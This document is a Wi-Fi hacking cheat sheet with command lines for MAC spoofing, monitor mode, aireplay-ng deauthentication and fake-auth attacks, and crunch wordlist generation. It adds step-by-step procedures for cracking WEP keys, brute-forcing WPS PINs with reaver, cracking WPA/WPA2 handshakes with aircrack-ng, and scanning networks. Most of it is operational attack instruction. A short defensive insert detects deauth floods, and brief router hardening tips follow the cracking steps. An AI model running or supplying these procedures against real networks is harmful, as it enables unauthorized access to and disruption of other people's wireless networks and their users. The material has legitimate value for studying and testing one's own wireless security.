
Network Hacking Main Page

Show available INTERFACE info

ifconfig
iwconfig

Changing MAC address

DESC : Change the MAC address of an interface

MAC = Media Access Control

ifconfig <INTERFACE> down
ifconfig <INTERFACE> hw ether <MAC_ADDRESS> # hw for hardware
ifconfig <INTERFACE> up

Changing wireless mode to Monitor

# step 1
ifconfig <INTERFACE> down
# step 2
airmon-ng check kill
# step 3
iwconfig <INTERFACE> mode monitor
# step 4
ifconfig <INTERFACE> up

WIFI Sniffing

DESC : airodump-ng is a packet sniffer program

USAGE : airodump-ng <INTERFACE>

  1. Change the wireless mode first : Managed to Monitor
  2. Run airodump-ng

options :

Simple sniffing on 2.4 GHz

airodump-ng <INTERFACE>

De-auth Attack with aireplay-ng

USAGE : aireplay-ng --deauth <#DEAUTH_PACKETS> -a <NETWORK_MAC> -c <TARGET_MAC> <INTERFACE>

  1. Run airodump-ng
  2. Run aireplay-ng

example :

aireplay-ng --deauth 100000 -a 11:22:33:44:55:66 -c 00:11:22:33:44:55 mon0
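
On the defender's side, the burst of deauthentication frames a command like this produces is easy to spot in monitor-mode telemetry. The following Python is an added example, not part of the original page: it assumes frame records of the form (timestamp, subtype, bssid, destination) as a capture parser or wireless IDS would emit, and flags any AP/client pair that receives more than a threshold of deauth frames inside a sliding time window.

```python
"""Detect a deauthentication flood from 802.11 management-frame records.

Added example, not from the original page. Input records are assumed to be
(epoch_seconds, subtype, bssid, destination_mac) tuples; the MAC addresses
below are the placeholder values used elsewhere on the page.
"""
from collections import defaultdict

AP = "11:22:33:44:55:66"      # placeholder access point BSSID
VICTIM = "00:11:22:33:44:55"  # placeholder client being kicked off
OTHER = "aa:bb:cc:dd:ee:ff"   # constructed client with normal activity

# Constructed sample: 50 deauth frames to one client within half a second
# (an attack), a few data frames, and two deauths to another client spread
# a minute apart (normal AP housekeeping, e.g. idle timeout).
SAMPLE_FRAMES = (
    [(100.0 + i * 0.01, "deauth", AP, VICTIM) for i in range(50)]
    + [(100.0 + i * 0.5, "data", AP, VICTIM) for i in range(5)]
    + [(0.0, "deauth", AP, OTHER), (60.0, "deauth", AP, OTHER)]
)


def detect_deauth_flood(frames, window=1.0, threshold=20):
    """Return {(bssid, dst): peak_count} for every pair that saw at least
    `threshold` deauth frames inside any `window`-second interval."""
    by_pair = defaultdict(list)
    for ts, subtype, bssid, dst in frames:
        if subtype == "deauth":
            by_pair[(bssid, dst)].append(ts)

    alerts = {}
    for pair, times in by_pair.items():
        times.sort()
        start, peak = 0, 0
        # Sliding window: advance `start` until the window fits, then the
        # number of frames in [times[start], t] is end - start + 1.
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[pair] = peak
    return alerts


if __name__ == "__main__":
    for (bssid, dst), n in detect_deauth_flood(SAMPLE_FRAMES).items():
        print(f"deauth flood: {n} frames from {bssid} to {dst} within 1s")
```

The detector only raises the alarm; the actual fix is enabling 802.11w Protected Management Frames on the access point, which authenticates deauth frames so forged ones are dropped.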

Fake-auth Attack with aireplay-ng

USAGE : aireplay-ng --fakeauth <#FAKEAUTH_PACKETS> -a <NETWORK_MAC> -h <INTERFACE_MAC> <INTERFACE>

example:

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 mon0

Wordlist with crunch

DESC : Wordlists are used to brute-force passwords; here is how to create your own wordlist

USAGE : crunch <MIN> <MAX> <CHARACTERS> -t <PATTERN> -o <FILE_NAME>

example :

crunch 6 8 123abc$ -t a@@@@b -o wordlist.txt

WIFI password cracking

WEP

DESC : WEP is a very basic RC4 encryption method that uses a random Initialisation Vector (IV) of only 24 to 128 bits
WEP = Wired Equivalent Privacy
IV + Password = Key Stream
To recover the password we perform statistical analysis on captured packets
The IV is prepended in clear to each packet sent to the router

If network is busy

  1. Change wireless mode to monitor
  2. Sniff packets on a specific BSSID and channel (capture a lot of #Data / IVs) and save them to a .cap file
  3. Analyse the captured IVs by running
     aircrack-ng <FILE_NAME>.cap


If network is not busy

We perform an association (not a connection) to force the network to generate IVs

  1. Change wireless mode to monitor
  2. Sniff packets on a specific BSSID and channel (capture a lot of #Data / IVs) and save them to a .cap file
  3. Do one Fake Authentication Attack
  4. Wait for an ARP packet, and replay it to force the network to create new IVs
     aireplay-ng --arpreplay -b <NETWORK_MAC> -h <INTERFACE_MAC> <INTERFACE>

  5. Then analyse the captured IVs by running
     aircrack-ng <FILE_NAME>.cap


WPS

DESC : WPS is not a type of encryption but a method to connect without entering the password
Used by some printers, and for easy connection with the WPS button on the router
We will brute-force the WPS PIN
The router's WPS must not be configured in “Push Button” / “PBC” mode; the only way to know is to test

  1. Change wireless mode to monitor
  2. List the networks with WPS enabled
     wash --interface <INTERFACE>

  3. Do some (30) Fake Authentication Attacks
  4. Brute-force with reaver
     reaver --bssid <NETWORK_MAC> --channel <CHANNEL> --interface <INTERFACE> -vvv --no-associate


WPA & WPA2

DESC : WPA fixed the WEP vulnerabilities; one remaining way in is to brute-force the password with a wordlist.
The main idea is to capture the handshake and then brute-force it offline
MIC = Message Integrity Code
The MIC is the value we try to reproduce by testing each password from the wordlist against the handshake data (AP address, STA address, AP Nonce, STA Nonce, EAPOL payload).

  1. Change wireless mode to monitor
  2. Sniff packets on a specific BSSID and channel (wait until the handshake is captured) and save them to a .cap file
  3. Do some (4) Fake Authentication Attacks
    1. force the handshake on one user
  4. Run aircrack-ng with the wordlist
     aircrack-ng <FILE_NAME>.cap -w <WORDLIST_FILE>


Implement Security for Router

  1. Make sure you set WPA2 as the encryption
  2. Make sure your password is long, with capital letters and special characters
  3. Make sure to disable WPS

Find router ip

[Windows]
Get-NetRoute

[Linux]
ip route

Network Information Gathering

With netdiscover

netdiscover -r <IP_RANGE>

example :
netdiscover -r 192.8.4.1/24

With zenmap, a GUI for nmap

  1. Set an IP range in the target field
  2. Select a Profile
  3. Run scan

ARP Attack

TODO